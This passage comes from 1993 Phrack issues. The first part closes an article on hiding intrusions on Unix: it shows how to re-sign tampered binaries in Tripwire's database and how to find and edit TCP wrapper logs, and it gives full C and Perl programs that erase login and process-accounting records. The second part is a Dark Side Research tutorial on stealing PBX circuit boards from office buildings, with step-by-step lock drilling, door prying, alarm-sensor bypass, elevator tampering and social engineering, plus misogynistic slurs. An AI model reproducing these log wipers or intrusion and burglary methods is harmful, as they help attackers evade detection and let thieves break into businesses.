 a given set of files remain free of unauthorized
 modifications if Tripwire reports no changes.

---- End of Tripwire excerpt

  Ok, so you know what tripwire does.  Yup, it creates signatures for all
files listed in a tripwire configuration file.  So, if you were to change
a file that is "tripwired", the proper authorities would be notified and your
changes could be recognized.  Gee.  That sounds great.  But there are a
couple of problems with this.

  First, tripwire wasn't made to run continuously (i.e., a change to a system
binary might not be noticed for several hours, perhaps days.)  This allows
somewhat of a "false" security for those admins who install tripwire.

  The first step in beating tripwire is to know if the system you are on
is running it.  This is trivial at best.  The default location where
tripwire installs its databases are /usr/adm/tcheck or /usr/local/adm/tcheck.

  The "tcheck" directory is basically made up of the following files:

  -rw-------  1 root         4867 tw.config
  drwxr-----  2 root          512 databases

  The file "tw.config" is the tripwire configuration file.  Basically, it's a
list if files that tripwire will create signatures for.  This file usually
consists of all system binaries, devices, and configuration files.

  The directory "databases" contains the actual tripwire signatures for
every system that is configured in tw.config.  The format for the database
filenames are tw.db_HOSTNAME.  An example signature entry might look like:

/bin/login 27 ../z/. 100755 901 1 0 0 50412 .g53Lz .g4nrh .g4nrt 0 1vOeWR/aADgc0
oQB7C1cCTMd 1T2ie4.KHLgS0xG2B81TVUfQ 0 0 0 0 0 0 0

   Nothing to get excited about.  Basically it is a signature encrypted in one
of the many forms supplied by tripwire.  Hard to forge, but easy to bypass.

   Tripwire takes a long time to check each file or directory listed in
the configuration file.  Therefore, it is possible to patch or change a system
file before tripwire runs a signature check on it.  How does one do this?
Well, let me explain some more.

   In the design of tripwire, the databases are supposed to be kept either on
a secure server or a read-only filesystem.  Usually, if you would want to
patch a system binary 9 times out of 10 you're going to want to have root
access.  Having root access to by-pass tripwire is a must.  Therefore, if you
can obtain this access then it is perfectly logical that you should be able to
remount a filesystem as Read/Write.  Once accomplished, after installing your
patched binary, all you have to do is:

   tripwire -update PATH_TO_PATCHED_BINARY

   Then, you must also:

   tripwire -update /usr/adm/tcheck/databases/tw.db_HOSTNAME
   (If they are making a signature for the tripwire database itself)

   You'll still be responsible for the changed inode times on the database.
But that's the risk you'll have to live with.  Tripewire wont detect the change
since you updated the database.  But an admin might notice the changed times.

# Wrapping up the wrappers

   Ta da.  You got the access.  uh-oh.  What if they are running a TCP
wrapper?  There are three basic ways they could be running a wrapper.

   1) They have modified /etc/inetd.conf and replaced the daemons they
      want to wrap with another program that records the incoming
      hostname and then spawns the correct daemon.

   2) They have replaced the normal daemons (usually in /usr/etc) with
      a program that records the hostname then launches the correct
      daemon.

   3) They have modified the actual wrappers themselves to record
      incoming connections.

  In order to bypass or disable them, you'll first need to know which
method they are using.

 First, view /etc/inetd.conf and check to see if you see something
similar to:

  telnet  stream  tcp     nowait  root    /usr/etc/tcpd     telnetd ttyXX

  This is a sure sign that they are running Wietse Venema's tcp_wrapper.

  If nothing is found in /etc/inetd.conf, check /usr/etc and check for any
abnormal programs such as "tcpd", "wrapd", and "watchcatd".  Finally, if
nothing is still found, try checking the actually daemons by running
"strings" on them and looking for logfiles or by using sum and comparing them
to another system of the same OS that you know is not using a wrapper.

  Okay, by now you know whether or not they have a wrapper installed.  If
so you will have to now decide what to do with the output of the wrapper.
You'll have to know where it put the information.  The most common wrapper
used is tcp_wrapper.  Here is another README excerpt detailing where the
actually output from the wraps are delivered.

---- Begin of tcp_wrapper README

  3.2 - Where the logging information goes
  ----------------------------------------

 The wrapper programs send their logging information to the syslog
 daemon (syslogd). The disposition of the wrapper logs is determined by
 the syslog configuration file (usually /etc/syslog.conf). Messages are
 written to files, to the console, or are forwarded to a @loghost.

 Older syslog implementations (still found on Ultrix systems) only
 support priority levels ranging from 9 (debug-level messages) to 0
 (alerts). All logging information of the same priority level (or more
 urgent) is written to the same destination.  In the syslog.conf file,
 priority levels are specified in numerical form.  For example,

 8/usr/spool/mqueue/syslog

 causes all messages with priority 8 (informational messages), and
 anything that is more urgent, to be appended to the file
 /usr/spool/mqueue/syslog.

 Newer syslog implementations support message classes in addition to
 priority levels.  Examples of message classes are: mail, daemon, auth
 and news. In the syslog.conf file, priority levels are specified with
 symbolic names: debug, info, notice, ..., emerg. For example,

     mail.debug   /var/log/syslog

 causes all messages of class mail with priority debug (or more urgent)
 to be appended to the /var/log/syslog file.

 By default, the wrapper logs go to the same place as the transaction
 logs of the sendmail daemon. The disposition can be changed by editing
 the Makefile and/or the syslog.conf file. Send a `kill -HUP' to the
 syslogd after changing its configuration file. Remember that syslogd,
 just like sendmail, insists on one or more TABs between the left-hand
 side and the right-hand side expressions in its configuration file.

---- End of tcp_wrapper README

  Usually just editing the output and hoping the sysadmin didnt catch the
the wrap will do the trick since nothing is output to the console
(hopefully).

# Example programs

  The following are short and sweet programs that give you the ability
to edit some of the more common logfiles found on most platforms.  Most
of these are pretty simple to compile, although some might need minor
porting and OS consideration changes in structures and configurations.

---- Begin of /etc/utmp editor:

/* This program removes utmp entries by name or number */

#include <utmp.h>
#include <stdio.h>
#include <sys/file.h>
#include <sys/fcntlcom.h>

void usage(name)
char *name;
{
    printf(stdout, "Usage: %s [ user ] or [ tty ]\n", name);
    exit(1);
}

main(argc,argv)
int argc;
char **argv;
{
    int fd;
    struct utmp utmp;
    int size;
    int match, tty = 0;

    if (argc!=2)
       usage(argv[0]);

    if ( !strncmp(argv[1],"tty",3) )
       tty++;

    fd = open("/etc/utmp",O_RDWR);
    if (fd >= 0)
    {
       size = read(fd, &utmp, sizeof(struct utmp));
       while ( size == sizeof(struct utmp) )
       {
          if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
            ( !strcmp(utmp.ut_name, argv[1]) ) )
          {
             lseek( fd, -sizeof(struct utmp), L_INCR );
             bzero( &utmp, sizeof(struct utmp) );
             write( fd, &utmp, sizeof(struct utmp) );
          }
          size = read( fd, &utmp, sizeof(struct utmp) );
       }
    }
    close(fd);
}

---- End of /etc/utmp editor

---- Begin of /usr/adm/wtmp editor:

/* This program removes wtmp entries by name or tty number */

#include <utmp.h>
#include <stdio.h>
#include <sys/file.h>
#include <sys/fcntlcom.h>

void usage(name)
char *name;
{
    printf("Usage: %s [ user | tty ]\n", name);
    exit(1);
}

void main (argc, argv)
int argc;
char *argv[];
{
    struct utmp utmp;
    int size, fd, lastone = 0;
    int match, tty = 0, x = 0;

    if (argc>3 || argc<2)
       usage(argv[0]);

    if (strlen(argv[1])<2) {
       printf("Error: Length of user\n");
       exit(1);
    }

    if (argc==3)
       if (argv[2][0] == 'l') lastone = 1;

    if (!strncmp(argv[1],"tty",3))
       tty++;

    if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) {
        printf("Error: Open on /usr/adm/wtmp\n");
        exit(1);
    }

    printf("[Searching for %s]:  ", argv[1]);

    if (fd >= 0)
    {
       size = read(fd, &utmp, sizeof(struct utmp));
       while ( size == sizeof(struct utmp) )
       {
          if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
            ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) &&
              lastone != 1)
          {
             if (x==10)
                printf("\b%d", x);
             else
             if (x>9 && x!=10)
                printf("\b\b%d", x);
             else
                printf("\b%d", x);
             lseek( fd, -sizeof(struct utmp), L_INCR );
             bzero( &utmp, sizeof(struct utmp) );
             write( fd, &utmp, sizeof(struct utmp) );
             x++;
          }
          size = read( fd, &utmp, sizeof(struct utmp) );
       }
    }
    if (!x)
       printf("No entries found.");
    else
       printf(" entries removed.");
    printf("\n");
    close(fd);
}

---- End of /usr/adm/wtmp editor

---- Begin of /usr/adm/lastcomm editor:

#!/perl

package LCE;

$date = 'Sun Jul  4 20:35:36 CST 1993';
$title = 'LCE';
$author = 'Phreak Accident';
$version = '0.0';
$copyright = 'Copyright Phreak Accident';


#------------------------------------------------------------------------------
# begin getopts.pl

# Usage: &Getopts('a:bc');  # -a takes arg. -b & -c not. Sets opt_*.

sub Getopts {
    local($argumentative)=@_;
    local(@args,$_,$first,$rest,$errs);
    local($[)=0;

    @args=split(/ */, $argumentative );
    while(($_=$ARGV[0]) =~ /^-(.)(.*)/) {
	($first,$rest) = ($1,$2);
	$pos = index($argumentative,$first);
	if($pos >= $[) {
	    if($args[$pos+1] eq ':') {
		shift(@ARGV);
		if($rest eq '') {
		    $rest = shift(@ARGV);
		}
		eval "\$opt_$first = \$rest;";
	    }
	    else {
		eval "\$opt_$first = 1";
		if($rest eq '') {
		    shift(@ARGV);
		}
		else {
		    $ARGV[0] = "-$rest";
		}
	    }
	}
	else {
	    print STDERR "Unknown option: $first\n";
	    ++$errs;
	    if($rest ne '') {
		$ARGV[0] = "-$rest";
	    }
	    else {
		shift(@ARGV);
	    }
	}
    }
    $errs == 0;
}

#  end  getopts.pl
#------------------------------------------------------------------------------

sub Initialize {

  $TRUE = '1';                                  # '1' = TRUE  = '1'
  $FALSE = '';                                  # ''  = FALSE = ''

  &Getopts('a:u:o:');				# Parse command line options
  $acct = $opt_a || $ENV{'ACCT'} || '/var/adm/pacct';
  $user = $opt_u || $ENV{'USER'} || `/bin/whoami` || 'root';
  $outf = $opt_o || $ENV{'OUTF'} || './.pacct';

  select(STDOUT); $|++;
  close(I);
  open(I,'(cd /dev; echo tty*)|');
  $ttys=<I>;
  close(I);
  @ttys = split(/ /,$ttys);
  for $tty (@ttys) {
    ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,
     $atime,$mtime,$ctime,$blksize,$blocks) = stat("/dev/$tty");
     $TTY{"$rdev"} = "$tty";
  }
  $TTY{'65535'} = 'NoTTY';

# Get passwd info --> id:passwd:uid:gid:name:home:shell
  close (I);
#  open(I,"cat /etc/passwd|");	# If you don't run nis...
  open(I,"ypcat passwd|");
  while (<I>) {
    chop;
    split(/:/);
    $PASSWD{"$_[$[+2]"}= $_[$[];
  }
  $PASSWD{"0"}= 'root';

# Get group info --> id:passwd:gid:members
  close (I);
#  open(I,"cat /etc/group|");	# If you don't run nis...
  open(I,"ypcat group | ");
  while (<I>) {
    chop;
    split(/:/);
    $GROUP{"$_[$[+2]"}= $_[$[];
  }
}
split(/ /,'Sun Mon Tue Wed Thu Fri Sat');
for ($x=$[ ; $x<$#_ ; $x++) {
  $DAY{"$x"} = $_[$x];
}
split(/ /,'Error Jan Feb Mar Apr MAy Jun Jul Aug Sep Oct Nov Dec');
for ($x=$[ ; $x<$#_ ; $x++) {
  $MONTH{"$x"} = $_[$x];
}

#------------------------------------------------------------------------------

sub LCE {
  &Initialize();
  open(I,"<$acct");
  close(O);
  open(O,">$outf");
  $template='CCSSSLSSSSSSA8';
  while (read(I,$buff,32)) {
    ($c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3) =
      unpack($template,$buff);
    ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
      localtime($bt);
    $mon++;
    $mon = "0$mon" if ($mon < 10);
    $mday = "0$mday" if ($mday < 10);
    $hour = "0$hour" if ($hour < 10);
    $min = "0$min" if ($min < 10);
    $sec = "0$sec" if ($sec < 10);
    $tt = localtime($bt);
    $flags='';
    if ($c1 & 0001) { $flags .= 'F'; }
    if ($c1 & 0002) { $flags .= 'S'; }
    if ($c1 & 0004) { $flags .= 'P'; }
    if ($c1 & 0010) { $flags .= 'C'; }
    if ($c1 & 0020) { $flags .= 'K'; }
    if ($c1 & 0300) { $flags .= 'A'; } 
    $c3 =~ s/\000.*$//;
    print STDOUT "$c3	$flags	$PASSWD{$u}/$GROUP{$g}	$TTY{$d}";
    print STDOUT "	$DAY{$wday} $hour:$min:$sec";
    if ($PASSWD{$u} eq $user) {
      print " [ERASED] ";
    } else {
      print O pack($template,$c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3);
    }
    print "\n";
  }
  close(O);
}

#------------------------------------------------------------------------------

&LCE();

#struct	acct
#  {
#  	char	ac_flag;		/* Accounting flag */
#  	char	ac_stat;		/* Exit status */
#  	uid_t	ac_uid;			/* Accounting user ID */
#  	gid_t	ac_gid;			/* Accounting group ID */
#  	dev_t	ac_tty;			/* control typewriter */
#  	time_t	ac_btime;		/* Beginning time */
#  	comp_t	ac_utime;		/* Accounting user time */
#  	comp_t	ac_stime;		/* Accounting system time */
#  	comp_t	ac_etime;		/* Accounting elapsed time */
#  	comp_t	ac_mem;			/* average memory usage */
#  	comp_t	ac_io;			/* chars transferred */
#  	comp_t	ac_rw;			/* blocks read or written */
#  	char	ac_comm[8];		/* Accounting command name */
#  };
#  
#  #define	AFORK	0001		/* has executed fork, but no exec */
#  #define  ASU 0002            /* used super-user privileges */
#  #define	ACOMPAT	0004		/* used compatibility mode */
#  #define	ACORE	0010		/* dumped core */
#  #define	AXSIG	0020		/* killed by a signal */
#  #define	ACCTF	0300		/* record type: 00 = acct */

---- End of /usr/adm/lastcomm editor

# All good things must come to an end

  In conclusion, you need to be smarter than the administrator.  Being
careless can get you busted.  Clean your footprints.  Watch the system.
Learn new tricks.  AND KEEP ON HACKING!

  Watch for my next article on 50 great system patches that will keep
your access just the way it is .. illegal.  Yaawhoo.

# End of article


--------------------------------------------------------------------------------


 
                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 15 of 27

[** NOTE:  The following file is presented for informational purposes
           only.  Phrack Magazine takes no responsibility for anyone
           who attempts the actions described within. **]


***************************************************************************

                    Physical Access & Theft of PBX Systems

                             A DSR Tutorial by :

                     CO/der DEC/oder & Cablecast 0perator.

                  (K)opywronged 1993, by Dark Side Research

***************************************************************************

BACKGROUND
~~~~~~~~~~

July 1989, Mobil Oil Corporation Headquarters -- Fairfax, VA.

     Abundant technology, late hours, and shadows between city lights
made up the typical environment CO/der DEC/oder repeatedly found
adventure in.  On one such night in the summer of '89, a reconnaissance
outing landed him at the offices of Mobil Oil Corp.  The door leading
from the multi-level parking garage into the foyer was equipped
with an access-request phone and a square black pad.  The pad was flush
with the wall, and sported a red LED in its center -- a rather imposing
device used to read magnetic access cards.  CODEC picked up the phone
and listened to a couple rings followed by the voice of a security
guard, "Good evening, security ..."
     "Evenin', this is Dick Owens with CACI graphics.  I don't have a
card, but just call upstairs and they'll verify."
     "Hold on, sir ..."
     Kastle Security's verification call registered as a sudden 90 VAC
spike on Cablecast 0perator's meter.  Clipped on the blue and white pair
of CACI's incoming hunt group, Cable picked up on his TS-21:
     "Hello?"
     "This is Kastle Security.  We've got a Dick Owens downstairs
requesting access."
     "Yeah Sure.  Let him in please."
     The security man took Codec off hold, "Okay sir, what entrance are
you at?"
     "Garage level one."
     The door clicked, and in went the hacker-thief -- grinning.
Another lock at the end of a hallway also hindered access, but a
screwdriver, placed between door and frame, removed the obstruction with
a quickly applied force.
     CACI was a graphics outfit sharing the same building with Mobil.
After a perusal through its desks and darkened corridors turned up a
cardkey for later use, Codec -- pausing casually along the way at the
drunking fountain -- made his way to the opposite end of the hallway and
into Mobil's mail receiving room.  In contrast to elsewhere in the
building, this room was chilly -- as if heavy air conditioning was
nearby.  There was also a faint roar of fans to enhance this notion.
And behind a countertop in the direction of the noise, a split door could
be seen through which mail and parcels were passed during business
hours.  Hardly an obstacle, he was on the other side in an instant.
This "other side" was no less than a gateway to nirvana.  At first he
began taking in the sight of a mini-computer, console, and mass storage
devices, but his eyes were virtually pulled to the giant on his left.
It was the largest and most impressive PBX he had yet seen; a label
above the five gargantuan, interconnected cabinets read, "AT&T SYSTEM
85."  The hacker's heart raced -- he wanted to explore, control, and own
the switch all at once.  Within seconds his gloved hands caressed the
cabinets while his hungry eyes scanned circuit pack descriptors, mouth
agape.  Codec grabbed some manuals, jotted down numbers to a modem
stack, and reluctantly departed.  A week later, he stole the switch.
     To the Dark Side Research group, the System 85 would be worth
approximately $100,000 -- but to Mobil, the system was worth at least
six times that figure.  In its entirety it was more valuable, but DSR
was only concerned with the guts; the digital circuitry of the system.
When Codec reentered the building the following week, he was wearing a
VOX headset attached to a hand-held 2-meter band (HAM) radio.  This was
strapped to his chest except for the rubber-whip antenna which protruded
out of a hole in his jacket.  His awestruck, gleeful countenance from
a week prior had been replaced by a more grave expression, and the
moisture now on his body was no longer from unconscious salivation
but due to the sweat of anticipation and rapid movement.
     "Phase one complete," he spoke into the boom mic in front of his
face.
     "Roger Nine-Two.  Quit breathing on the VOX or adjust sensitivity,
over."
     "Roger Nine-Three.  Entering heavy EMI area," Codec acknowledged to
one of the lookouts.
     Steps were retraced through the mail room, where several empty
boxes marked "U.S. Mail" and a dolly were conveniently stored.  The
System 85 was shut down, cabinet by cabinet, as most of the circuit
boards were hastily removed and boxed.  Seven boxes were filled,
requiring two trips with the dolly to a side door.
     "All units: ready for docking."
     "Roger Nine-Two.  Standby.  Nine-Three, okay for docking?"
     "Step on it, over ..."
     A Ford Escort with its hatch open raced up to where Codec and the
boxes stood.  Within fifteen minutes the circuit packs were unloaded in
a public storage unit.  Within half an hour, CO/dec DEC/oder, Cablecast
0perator, and the remainder of the night's crew were filling up with
doughnuts of the nearby 7-11, observing local law enforcement doing the
same.

APRIL 1993: Security memorandum broadcast from wrq.com -- Internet

     "We've all heard of toll fraud as a way to steal telecommunications
resources.  Now the ante has been escalated.  I've heard of a
company on the East Coast that was having some minor troubles with their
PBX.  A technician showed up at the door and asked directions to the PBX
closet.  The company showed this person the way without checking any
credentials, and about five minutes later the phones went completely
dead.  They went up to the PBX closet and found that several boards from
the PBX had been removed and that the 'repairman' had departed."


     The theft of PBX circuit boards is a novel idea and seldom heard
of, but -- as made apparent above -- it does occur.  In the used PBX
scene, often referred to as the "secondary" or "grey" market, there is
always a demand for circuit packs from a wide variety of PBXs.  The
secondhand PBX industry grew from $285 million in 1990 to $469 million
in 1992 -- despite the recession.
     The essence of any PBX is a rack or multiple racks of circuit
cards/boards/packs, with an average grey market value of anywhere from
$50 to $2000 each.  The cards are lightweight, small in size, and can
even withstand a moderate dose of abuse.  Transport of misappropriated
circuit boards is done without risk -- under and police scrutiny, a box
of these looks like a mere pile of junk (or senior engineering project)
in the trunk of your car.  Furthermore, the serial numbers on the boards
are seldom, if ever, kept track of individually, and these can be
removed or "replaced" in any case.  Unlike computer equipment or
peripherals, PBX cards are extremely safe, simple, and non-proprietary
components to handle -- even in quantity.
     Although you may wish to physically access PBXs for reasons other
than theft, it will be assumed here that monetary gain is your motive.
In either case, this introductory file makes it clear that access can be
achieved with varying levels of ease.  A PBX theft should be thought of
in terms of two phases:  reconnaissance and extraction.  Recon involves
finding and selecting prime targets.  Extraction is the actual theft of
the system.  Both phases can be completed through "office building
hacking," a wide variety of deception, breaking and entering, social
engineering, and technical skills.

Phase I : Reconnaissance

     PBXs are found where people's communications needs warrant the
capabilities of such a system -- offices, schools, hotels, convention
centers, etc.  The PBXs we will concert ourselves with in this discourse
however are those located in shared or multiple-leased office
structures; the "typical" office buildings.  The typical office building
has enough floors to require an elevator, some parking space, a lobby,
and a company directory (Because it is shared by more than one
business).  Companies that occupy an entire building by  themselves are
generally too secure to be worthwhile targets.
     Tenant companies in the typical building lease all different size
office space -- some rent only 300 sq. ft., others take up entire
floors.  Those that use half a floor or more usually meet the criteria
for PBX ownership.  Obviously, the larger the firm's office at that
site, the greater its PBX will be, so those business spread out over
several floors will have the most valuable systems.  This is not always
an overwhelming factor in determining a target however.  The smaller
systems are often easier to get at -- and ultimately to remove --
because they tend to be located in utility closets off publicly
accessible hallways as opposed to within a room inside an office space.
Those closets, sometimes labeled "telephone" and even unlocked, will be
found one or two per floor!  Other closets may exist for electrical
equipment, HVAC, plumbing, janitorial supplies, or for a combination of
these uses in addition to telephone service.
     A phone closet is easily distinguishable whether or not a switch or
key system is present.  A web of low-voltage (22 AWG), multi-colored
wiring will be channelled and terminated on a series of white "66"
blocks mounted on the wall.  These blocks are a few inches wide, and
roughly a foot long, with rows of metallic pins that the wiring is
punched into with a special tool.  As a general rule, if the system is
fastened to the wall and doesn't have at least one muffin fan built-in
and running, it's either a measly key system or a PBX too small to
deserve your attention.  Those worthy of your time will stand alone as a
cabinet with a hinged door, contain shelves of circuit cards, and
emanate the harmonious hum of cooling fans.  As an example, Mitel PBXs
commonly fit cozily in closets -- sometimes even one of the newer ROLMs
or a voice mail system.  On the other hand, an NT SL-100 should
not be an expected closet find.
     Wandering through office buildings in search of phone closets
during business hours is easy, so long as you dress and act the part.
You'll also want to look confident that you know what you're doing and
where you're going.  Remember, these buildings are open to the public
and an employee of one company can't tell whether or not you're a client
of another.  When going in and out of the phone closets, who's to know
you're not a technician or maintenance man?
     Apart from searching the closets, you can approach the secretaries.
Feign being lost and ask to use the telephone.  Steal a glance at the
console and you'll know (with a little practice) what type of PBX
they've got.  This is very valuable information, for it may save you
from unsuccessfully breaking into the closet (should it be locked) or
the company itself.  Secretaries are cute, courteous, and dumb.  You
shouldn't have a problem convincing her to give you the key to the phone
closet if you're posing as a technician.  If you're feeling as confident
as you should be, you may even get a date with the bitch.  And should
you ever raise suspicion, you always have the option of bailing out and
making a break for the stairwell.  No business exec is going to chase
you down.
     Some additional methods can be employed in conjunction with
visiting the buildings, or as a precursor to such :

-- Classified ads.  A company with job openings is all the more
vulnerable to your dark motives.  Using the help-wanted section of your
newspaper, look for receptionist and secretarial positions.  Call and
ask, "What type of phone system will I be required to handle?"  You may
also want to go in and apply for the job -- any job at a large firm will
do.  You'll learn the type of system installed, some details about
security, etc; this is a very sophisticated way of "casin' the joint."

-- Scanning for RMATS.  Using your preferred wardialer (such as
ToneLoc), scan business districts for PBX remote maintenance modems then
CNA your finds.

-- Targeting interconnects.  Interconnects are PBX dealers that sell,
install, and maintain the systems on contract.  Capture a database of
clients and you'll have a windfall of leads and pertinent info.  AT&T
allegedly sells its database by region.  Also, intercept voice mail or
company e-mail.  Interconnects make decent targets themselves.

-- Users groups and newsletters.  Some of the extremely large PBX owners
join users groups.  Though this is abstract, owners will discuss their
systems openly at the meetings.  Newsletters are mailed out to members,
often discussing special applications of specific locations in detail.
Great for making sales contacts.

Phase II : Extraction

     Removing the PBX calls for an assessment of obstacles versus
available means and methods.  The optimum plan incorporates a late
afternoon entry with a nighttime departure.  This means entering the
building during business hours and hiding, either in the PBX closet
itself or any room or empty space where you can wait until after hours
to re-emerge.  This is the most safest and effective of methods.  You
need not worry about alarms or breaking in from outside, and you can
take advantage of one of the greatest weaknesses in corporate office
security -- janitors.  The janitorial staff, if you act and dress
properly, will allow you to walk right into an office while they're
cleaning.  If you're already in an office and they enter, just act like
you own the place and it'll be assumed you work there.  If you prefer
not to be seen, keep hidden until the cleaning is done on your floor.
(Be sure not to make the idiotic mistake of hiding in the janitor's
closet).  Although the custodians will lock the doors behind them, any
alarms in the building will remain off until cleaning for the entire
structure is complete.
     There is simply nothing so elegant as entering the building during
the daytime hours, hiding, and re-emerging to wreak havoc when
everyone's gone.  (A patient wait is required -- take along a Phrack to
read).  Unfortunately, entry will not always be so easy.  The phone
closet may have a dead-bolt lock.  There may be no feasible hiding
place.  People may constantly be working late.  Because of all the
potential variables, you should acquire a repertoire of means and
methods.  Use of these methods, though easy to learn, is not so quickly
mastered.  There is a certain "fluidity of technique" gained only
through experience.  Deciding which to use for a given situation will
eventually come naturally.

-- Use of tools.  You can easily get around almost any office building
using only screwdrivers.  With practice, prying doors will be quick and
silent.  Although some doors have pry-guards or dead-bolts, about every
other phone closet you'll encounter can be opened with a screwdriver.
Before forcing the gap between door and frame, try sliding back the
locking mechanism.  For best results, work it both ways with a pair of
screwdrivers; a short one for leverage, a longer one for manipulation.
     For dead-bolts, a pipe wrench (a wrench with parallel grips) can
turn the entire lock 90 degrees.  Interior doors are cheaply
constructed; if you can wrench the lock, it'll turn and the bolt will be
pulled back into the door.  Quality dead-bolts have an inclined exterior
to prevent it from being gripped.  For these, diamond-cutting string can
be applied.  This is available at select plumbing supply houses for $150
upwards.

-- Ceilings and adjacent offices.  Not only are the doors cheap inside
office buildings, so are the walls.  If you're having trouble with a
door or lock, push up a ceiling tile with your screwdriver and see if
the wall stops or is continuous.  If it stops, you may choose to climb
over.  If you're already inside an office and find a particular room
locked, climbing is always an option because walls are never continuous
between rooms.  Walls are seldom continuous between business either; if
you can't get into a particular office space, try through adjacent
space.

-- Brute force.  If making noise is not a serious concern, a crowbar
will pry any door open.  For most situations requiring this level of
force, a sleek, miniature bar is all you need.  You can also saw or
hammer your way through any interior wall.  Once you've made a hole in
the sheetrock, you can practically break out the remainder of an opening
yourself using only your hands.
     From the outside, windows can be broken or removed.  Office
building glass is installed from the outside, so by removing the seal
and applying a suction device, you can pull the entire window out.
Breaking the glass is not too difficult, but frighteningly loud.  Using
a screwdriver, push the blade between the edge and its frame and pry.
Eventually you'll have holes and cracks running across the window.
Building glass is typically double-paned; once through the exterior
layer, you'll have to break the next.  Because the second layer isn't as
thick, you have the option of prying or smashing.  This sounds extremely
primitive -- it is, but it may be the only method available to you.
Highly-alarmed office structures do not have the windows wired.  When
there's a 5,000-port NEC NEAX 2400 in view and alarms everywhere else,
you'll break the fucking glass.

-- Alarm manipulation.  Entire files could be written on this subject.
Some relevant facts will be touched on here; no MacGyver shit.
     Our "typical" office building, if alarmed, has one of three types
of alarm plans.  The alarm system is either externally-oriented,
internally-oriented, or both.  More often than not, externally-oriented
alarm systems are encountered.  These focus on keeping outside intruders
from entering the building -- interior offices are secured only by
locks.  Alarm devices such as magnetic switches and motion detectors are
in place solely in lobby areas and on doors leading from outside.  If
you know in advance that you can readily enter any of the offices, the
alarm is harmless.  After entering, go directly into the office and look
out the window.  Eventually, security or police will arrive, look
around, then reset the alarm and leave -- so long as you haven't left
any trace of your entry (damaged doors, ceiling tile fragments, etc).
Although common areas and corridors will be briefly scanned, no company
offices will be entered.
     Internally-oriented alarm plans include alarms on individual
offices and are more difficult to reckon with.  However, the sensors are
only on the doors; any method that avoids opening the door can still be
used.
     Access controls like cardkeys are impressive in appearance but do
not automatically represent an alarm.  If you open the door without
inserting a cardkey, the system must be equipped to know whether a
person entered the building or exited.  Thus, only those systems with
motion detectors or a "push button to exit" sign and button can cause an
alarm at the cardkey-controlled door.  Otherwise the door and cardkey
device is no more than a door with an electronic lock.  There are always
exceptions to the rules, of course; never trust any alarm or access
control system.  Sometimes a system will be programed to assume any
opened door is someone entering, not exiting.  Check for sensors --
mounted flush on the door frame -- look carefully, they'll sometimes be
painted over.  Check both sides and top of the frame.  If a sensor is
found (or when in doubt) hold the door open for about ten seconds, then
wait and watch for up to an hour to see if there's a silent alarm.
     For the "push button to exit" entrances, you can sometimes use a
coat hanger or electricians fish tape to push the button from outside
using cracks around the door.  Where motion detectors automatically open
the entrance, similar devices can be employed to create enough commotion
to activate the detector (depending on detector type).
     Disabling part of the alarm system may be a possibility during the
day.  Chances are, if you can access the control CPU you've also got a
place to hide, and the control box is often alarmed against tampering
anyway.  Many of the latest systems are continuously monitored from a
central station.  If not, you can disconnect the alarm box from its
phone line.  Your best approach however is to alter a door
sensor/magnetic switch circuit.  You can use a piece of conductive hot
water duct tape to trick the sensor into thinking the door is always
closed.  This tape looks like tin foil with an adhesive on one side.
Obtain a similar sensor and test at home before relying on this --
magnetic switches come in many shapes and forms.  The better systems
don't even check for normally-open or normally-closed states, but for
changes in the loop's resistance.  This means simply cutting or
shorting the lead wires won't suffice.  But if the conductive tape won't
do, you can always just cut the leads and return in a couple days.  If
the cut hasn't been repaired, then you have an entry point.  Building
managers become lax with an alarm system after it's been installed for a
while and there haven't been any break-ins.  Other loops are disabled
after late-working employees repeatedly off the alarm.  One other option
is to cut and splice both parts of the sensor back into the loop so that
it remains unaffected by movement of the door.  The throughways to
target for any of these alterations are minor side doors such as parking
garage or stairwell exits.  You should be pleasantly surprised with the
results.

-- Locks and picks.  (This could be another textfile in itself).
Lockpicking is an extremely useful skill for PBX appropriation but
requires quite a bit of practice.  If you aren't willing to invest the
time and patience necessary to become effective with this skill,
screwdrivers are the next best thing.  Furthermore, with all the
different types and brands of locks in existence, you'll never be able
to solely rely on your lockpicking skills.  Acquire this ability if your
involvement in underworld activities is more than just a brief stint...

     You can more readily take advantage of the skills possessed by
locksmiths.  Because the offices within a typical building all use the
same brand lock with a common keying system, any of the locks can yield
the pattern for a master key to the whole system.  Obtain a spare lock
from the basement, maintenance room, or anywhere extra doors and
hardware are stored, and take it to a locksmith.  Request a key for that
lock and a master.  Many of the offices should now be open to you.
     Some keys are labeled with numbers -- if the sequence on the key
equals the number of pins in the lock, you can write down the number and
lock brand, and get a duplicate of the key cut.
     There is also a little locksmithing you can do on your own.  With a
#3 triangular "rat tail" file and a key blank to the brand lock you are
targeting, you can make your own key.  Blanks are either aluminum or
brass and scratch easily -- this is no accident.  By inserting a key
blank in the lock and moving it from side to side, you'll create
slate-colored scratch lines on the blank from the lock's pins.  The
lines will indicate where to begin filing a valley -- there'll be one
for each pin.  Move the file back and forth a few times and re-insert
the key to make new lines.  Use the point of the file only when
beginning the valley; successive passes should not create a point at the
bottom of the cut but leave a flat gap.  When no new scratch appears on
the bottom of a particular valley, don't file the valley any deeper --
it's complete.  Eventually, all the valleys will be cut and you'll have
a key to open the lock.
     Last but certainly not least, you can drill most locks where a
little noise can be afforded.  Using a 1/4 inch Milwaukee cordless drill
with about a 1/8 inch carbide-tipped bit, you can drill a hole the
length of the lock's cylinder.  Drill approximately 1/8 inch directly
above the keyhole.  This destroys the lock's pins in its path, and
allows others above to fall down into the hole.  Now the cylinder will
turn with any small screwdriver placed in the keyhole and open the lock.
Little practice is demanded of this technique, and it's a hell of a lot
of fun.

-- Elevator manipulation.  Elevators can be stubborn at times in
rejecting your floor requests.  Companies that occupy entire floors must
prevent an after-hours elevator from opening up on their unattended
office.  If there's a small lock corresponding or next to that floor's
selection button, unscrew the panel and short out the two electrical
leads on the other end of the lock.  Continue to short the contacts
until you press the button and it stays lit -- you'll then arrive at
your desired floor.
     The elevator motor and control room is located either on the roof
or penthouse level and can be frequently found accessible.  Besides
